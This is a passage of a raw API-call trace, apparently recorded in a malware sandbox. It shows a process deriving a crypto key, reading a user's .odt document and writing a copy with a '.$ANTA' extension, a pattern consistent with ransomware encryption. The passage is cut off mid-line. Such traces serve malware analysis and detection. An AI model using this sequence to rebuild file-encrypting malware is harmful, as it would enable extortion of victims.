lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2668, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0078.969] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.969] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0078.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43caeb0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0078.969] CryptHashData (hHash=0x41ac280, pbData=0x17e2ae8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0078.969] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.969] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0078.969] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0078.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cb060, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0078.969] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac280, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac140) returned 1 [0078.969] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.969] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0078.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796fc8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0078.970] CryptDestroyHash (hHash=0x41ac280) returned 1 [0078.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0078.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea0b8 [0078.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0078.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1e0 [0078.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2d0 [0078.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb300 [0078.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0078.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0078.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb288 [0078.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb108 [0078.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0078.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0078.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0078.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0078.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0078.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0078.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0078.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0078.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0078.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0078.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9c68 [0078.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0078.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0078.971] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0078.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0078.971] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0078.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0078.971] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0078.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0078.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0078.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0078.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0078.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0078.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0078.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0078.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0078.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0078.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0078.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eb3a8 [0078.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0078.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0078.971] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\cYT5WT.odt" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\cyt5wt.odt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0078.972] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.972] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0078.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0078.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0078.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0078.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0078.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0078.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0078.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0078.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0078.972] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0078.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0078.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0078.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0078.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0078.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0078.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0078.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0078.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0078.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0078.972] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0078.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0078.973] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0078.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0078.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0078.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0078.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0078.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0078.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0078.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0078.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0078.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0078.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0078.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0078.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0078.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0078.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0078.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0078.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0078.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0078.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0078.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0078.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0078.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0078.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0078.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0078.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0078.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0078.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0078.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e38 [0078.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0078.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431e298 [0078.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0078.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0078.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0078.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0078.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431e298 | out: hHeap=0x1780000) returned 1 [0078.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0078.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0078.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0078.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e38 | out: hHeap=0x1780000) returned 1 [0078.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0078.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0078.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0078.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0078.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0078.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0078.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369f80 [0078.974] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg")) returned 0x10 [0078.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369f80 | out: hHeap=0x1780000) returned 1 [0078.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0078.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0078.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0078.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0078.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0078.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0078.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43fb3b0 [0078.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0078.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0078.975] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\cYT5WT.odt.$ANTA" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\cyt5wt.odt.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0078.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0078.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0078.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0078.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0078.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0078.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0078.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0078.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0078.976] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0078.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0078.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0078.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0078.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0078.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0078.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0078.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0078.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0078.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0078.976] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0078.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0078.976] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0078.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0078.976] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0078.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0078.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0078.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0078.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0078.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0078.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0078.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0078.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0078.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0078.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0078.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0078.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0078.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0078.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0078.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0078.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0b020 [0078.980] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0078.981] ReadFile (in: hFile=0x258, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ecd0*=0x10000, lpOverlapped=0x0) returned 1 [0078.983] ReadFile (in: hFile=0x258, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ecd0*=0x8b87, lpOverlapped=0x0) returned 1 [0078.986] ReadFile (in: hFile=0x258, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0078.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0078.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0078.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0078.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0078.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18b87) returned 0x48f0048 [0078.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0b020 | out: hHeap=0x1780000) returned 1 [0078.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0078.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0078.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0078.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0078.990] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0078.990] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18b87) returned 0x4908bd8 [0078.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x48f0048 | out: hHeap=0x1780000) returned 1 [0078.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0078.990] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0078.990] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0078.990] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0078.990] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0078.990] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0078.990] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0078.990] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18b87) returned 0x48f0048 [0078.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0078.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x48f0048 | out: hHeap=0x1780000) returned 1 [0078.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0078.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0078.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0078.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0078.991] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0078.991] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0078.991] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0078.991] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0078.991] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0078.991] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0078.991] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0078.991] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41abfc0 [0078.991] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0078.991] RtlAllocateHeap (HeapHandle=0x1780000, 